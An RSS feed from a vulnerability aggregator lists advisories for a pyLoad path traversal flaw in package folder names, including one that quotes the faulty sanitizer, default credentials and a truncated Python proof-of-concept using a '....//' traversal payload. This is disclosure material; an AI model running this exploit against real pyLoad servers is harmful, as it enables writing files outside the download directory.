<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 11:35:25 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-310048</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-310048</link>
      <description>EUVD-2026-310048</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-310048</guid>
    </item>
    <item>
      <title>fkie_cve-2026-42314</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-42314</link>
      <description>&lt;p&gt;pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-42314</guid>
    </item>
    <item>
      <title>GHSA-97r3-5w84-r4q8 — PyLoad Vulnerable to Path Traversal via Package Folder Name</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-97r3-5w84-r4q8</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;Insufficient sanitization of package folder names allows writing files outside the intended download directory.&lt;/p&gt;
&lt;p&gt;## Affected Component
- `src/pyload/core/api/__init__.py`
- Function: `add_package()`&lt;/p&gt;
&lt;p&gt;## Description
Package folder names are sanitized using insufficient string replacement:&lt;/p&gt;
&lt;p&gt;```python
folder = (
    folder.replace(&amp;#34;http://&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;https://&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;../&amp;#34;, &amp;#34;_&amp;#34;)  # Bypassable!
    .replace(&amp;#34;..\\&amp;#34;, &amp;#34;_&amp;#34;)
    .replace(&amp;#34;:&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;/&amp;#34;, &amp;#34;_&amp;#34;)
    .replace(&amp;#34;\\&amp;#34;, &amp;#34;_&amp;#34;)
)
```&lt;/p&gt;
&lt;p&gt;The `../` replacement is bypassable. The pattern `....//` becomes `.._` after replacement (partial removal), leaving `..` which can be exploited when the path is later resolved by the OS.&lt;/p&gt;
&lt;p&gt;## Proof of Concept&lt;/p&gt;
&lt;p&gt;### Setup
```bash
pip install pyload-ng[all]
pyload -d &amp;amp;
# Default credentials: pyload / pyload
```&lt;/p&gt;
&lt;p&gt;### Exploit
```python
#!/usr/bin/env python3
import requests&lt;/p&gt;
&lt;p&gt;BASE_URL = &amp;#34;http://localhost:8000&amp;#34;
USERNAME = &amp;#34;pyload&amp;#34;
PASSWORD = &amp;#34;pyload&amp;#34;&lt;/p&gt;
&lt;p&gt;session = requests.Session()&lt;/p&gt;
&lt;p&gt;# Login
session.post(f&amp;#34;{BASE_URL}/login&amp;#34;, data={
    &amp;#34;username&amp;#34;: USERNAME,
    &amp;#34;password&amp;#34;: PASSWORD
})&lt;/p&gt;
&lt;p&gt;# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = &amp;#34;....//....//....//tmp/evil&amp;#34;&lt;/p&gt;
&lt;p&gt;resp = session.post(f&amp;#34;{BASE_URL}/api/add_package&amp;#34;, json={
    &amp;#34;name&amp;#34;: &amp;#34;test_package&amp;#34;,
    &amp;#34;links&amp;#34;: [&amp;#34;http://example.com/file.txt&amp;#34;],
    &amp;#34;dest&amp;#34;: 1  # Destination.QUEUE
})&lt;/p&gt;
&lt;p&gt;package_id = resp.json()
print(f&amp;#34;Created p…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;Insufficient sanitization of package folder names allows writing files outside the intended download directory.&lt;/p&gt;
&lt;p&gt;## Affected Component
- `src/pyload/core/api/__init__.py`
- Function: `add_package()`&lt;/p&gt;
&lt;p&gt;## Description
Package folder names are sanitized using insufficient string replacement:&lt;/p&gt;
&lt;p&gt;```python
folder = (
    folder.replace(&amp;#34;http://&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;https://&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;../&amp;#34;, &amp;#34;_&amp;#34;)  # Bypassable!
    .replace(&amp;#34;..\\&amp;#34;, &amp;#34;_&amp;#34;)
    .replace(&amp;#34;:&amp;#34;, &amp;#34;&amp;#34;)
    .replace(&amp;#34;/&amp;#34;, &amp;#34;_&amp;#34;)
    .replace(&amp;#34;\\&amp;#34;, &amp;#34;_&amp;#34;)
)
```&lt;/p&gt;
&lt;p&gt;The `../` replacement is bypassable. The pattern `....//` becomes `.._` after replacement (partial removal), leaving `..` which can be exploited when the path is later resolved by the OS.&lt;/p&gt;
&lt;p&gt;## Proof of Concept&lt;/p&gt;
&lt;p&gt;### Setup
```bash
pip install pyload-ng[all]
pyload -d &amp;amp;
# Default credentials: pyload / pyload
```&lt;/p&gt;
&lt;p&gt;### Exploit
```python
#!/usr/bin/env python3
import requests&lt;/p&gt;
&lt;p&gt;BASE_URL = &amp;#34;http://localhost:8000&amp;#34;
USERNAME = &amp;#34;pyload&amp;#34;
PASSWORD = &amp;#34;pyload&amp;#34;&lt;/p&gt;
&lt;p&gt;session = requests.Session()&lt;/p&gt;
&lt;p&gt;# Login
session.post(f&amp;#34;{BASE_URL}/login&amp;#34;, data={
    &amp;#34;username&amp;#34;: USERNAME,
    &amp;#34;password&amp;#34;: PASSWORD
})&lt;/p&gt;
&lt;p&gt;# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = &amp;#34;....//....//....//tmp/evil&amp;#34;&lt;/p&gt;
&lt;p&gt;resp = session.post(f&amp;#34;{BASE_URL}/api/add_package&amp;#34;, json={
    &amp;#34;name&amp;#34;: &amp;#34;test_package&amp;#34;,
    &amp;#34;links&amp;#34;: [&amp;#34;http://example.com/file.txt&amp;#34;],
    &amp;#34;dest&amp;#34;: 1  # Destination.QUEUE
})&lt;/p&gt;
&lt;p&gt;package_id = resp.json()
print(f&amp;#34;Created p…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-97r3-5w84-r4q8</guid>
    </item>
    <item>
      <title>PYSEC-2026-128</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-128</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-128</guid>
    </item>
  </channel>
</rss>
